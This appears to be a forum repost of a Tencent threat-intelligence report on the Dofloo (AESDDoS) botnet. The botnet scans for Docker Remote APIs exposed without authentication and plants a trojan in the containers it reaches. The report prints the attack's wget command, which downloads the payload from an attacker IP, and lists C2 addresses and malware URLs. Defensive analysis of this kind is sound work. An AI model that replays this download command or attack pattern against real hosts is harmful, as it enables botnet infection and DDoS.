• Welcome to the world's largest Chinese hacker forum

    Welcome to the world's largest Chinese hacker forum, our forum registration is open! You can now register for technical communication with us, this is a free and open to the world of the BBS, we founded the purpose for the study of network security, please don't release business of black/grey, or on the BBS posts, to seek help hacker if violations, we will permanently frozen your IP and account, thank you for your cooperation. Hacker attack and defense cracking or network Security

    business please click here: Creation Security  From CNHACKTEAM

Dofloo(AESDDoS)僵尸网络正批量扫描、攻击Docker容器


This Wind

Recommended Posts

导语:植入Dofloo僵尸网络木马,盗窃用户信息。

一、背景

腾讯安全威胁情报中心检测到Dofloo(AESDDoS)僵尸网络正批量扫描和攻击Docker容器。部分云主机上部署的Docker容器没有针对远程访问做安全认证,存在Remote API允许未授权使用漏洞且暴露在公网,导致黑客通过漏洞入侵并植入Dofloo僵尸网络木马。一旦被植入Dofloo僵尸网络木马,受控云主机会泄露敏感信息、接收C2指令、执行DDoS攻击。

云计算兴起后,服务器硬件扩展非常便利,软件服务部署成为了瓶颈,Docker作为开源的引擎可以轻松地为任何应用创建一个轻量级的、可移植的、自给自足的容器,因而逐渐得到广泛应用。而开发者在部署Docker时未对相关服务进行正确合理的配置导致其容易成为黑客入侵的路径之一,之前已有H2Miner利用Docker漏洞进行入侵挖矿的案例被披露(

二、详细分析

在此次攻击中,攻击者首先通过向端口2375(与Docker守护进程通信的默认端口)发送TCPSYN数据包对给定的IP范围进行批量扫描。确定开放端口的目标IP后,发送请求调用/containers/json接口获取正在运行中的容器列表,之后使用Docker EXEC命令执行以下shell访问公开主机中所有正在运行的容器并下载木马Linux2.7。

获取容器列表:

Dofloo(AESDDoS)僵尸网络正批量扫描、攻击Docker容器

图1

针对运行状态的容器利用Docker EXEC执行木马下载命令:

wget -P /tmp/ http[:]//49.235.238.111:88/Linux2.7

Dofloo(AESDDoS)僵尸网络正批量扫描、攻击Docker容器

图2

被下载的Dofloo僵尸网络木马Linux2.7会连接到49.235.238.111:48080来发送和接收来自攻击者的远程shell命令。

Dofloo(AESDDoS)僵尸网络正批量扫描、攻击Docker容器

图3

Dofloo(AESDDoS)僵尸网络正批量扫描、攻击Docker容器

图4

Dofloo僵尸网络还会在从被感染系统窃取信息,包括操作系统版本,CPU型号、速度和类型。

Dofloo(AESDDoS)僵尸网络正批量扫描、攻击Docker容器

图5

通过将自身路径写入/etc/rc.local、/etc/rc.d/rc.local、/etc/init.d/boot.local文件中以添加为自启动项。

Dofloo(AESDDoS)僵尸网络正批量扫描、攻击Docker容器

图6

使用AES算法对窃取的系统信息和命令和控制(C&C)数据进行加密。

Dofloo(AESDDoS)僵尸网络正批量扫描、攻击Docker容器

图7

此Dofloo变种能够发起各种类型的DDoS攻击,包括DNS、SYN,LSYN,UDP,UDPS,TCP和CC Flood。

Dofloo(AESDDoS)僵尸网络正批量扫描、攻击Docker容器

图8

IOCs

C&C

49.235.238.111:48080

175.24.123.205: 48080

IP

49.235.238.111

89.40.73.126

175.24.123.205

URL

http[:]//49.235.238.111[:]88/Linux2.7

http[:]//49.235.238.111/Lov.sh

http[:]//49.235.238.111/lix

http[:]//49.235.238.111/Verto

http[:]//49.235.238.111[:]88/NgYx

http[:]//49.235.238.111/linux-arm

http[:]//49.235.238.111/shre.sh

http[:]//89.40.73.126[:]8080/Linux2.7

http[:]//89.40.73.126/linux2.6

http[:]//89.40.73.126[:]8080/linux-arm

http[:]//89.40.73.126[:]8080/Linux2.6

http[:]//89.40.73.126[:]8080/YmY

http[:]//89.40.73.126[:]8080/LTF

http[:]//89.40.73.126[:]8080/NgYx

http[:]//89.40.73.126[:]8080/Mar

http[:]//89.40.73.126[:]8080/linux2.6

http[:]//89.40.73.126[:]8080/Flood

http[:]//175.24.123.205:88/Fck

MD5

Dofloo(AESDDoS)僵尸网络正批量扫描、攻击Docker容器

参考链接:

Link to comment
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now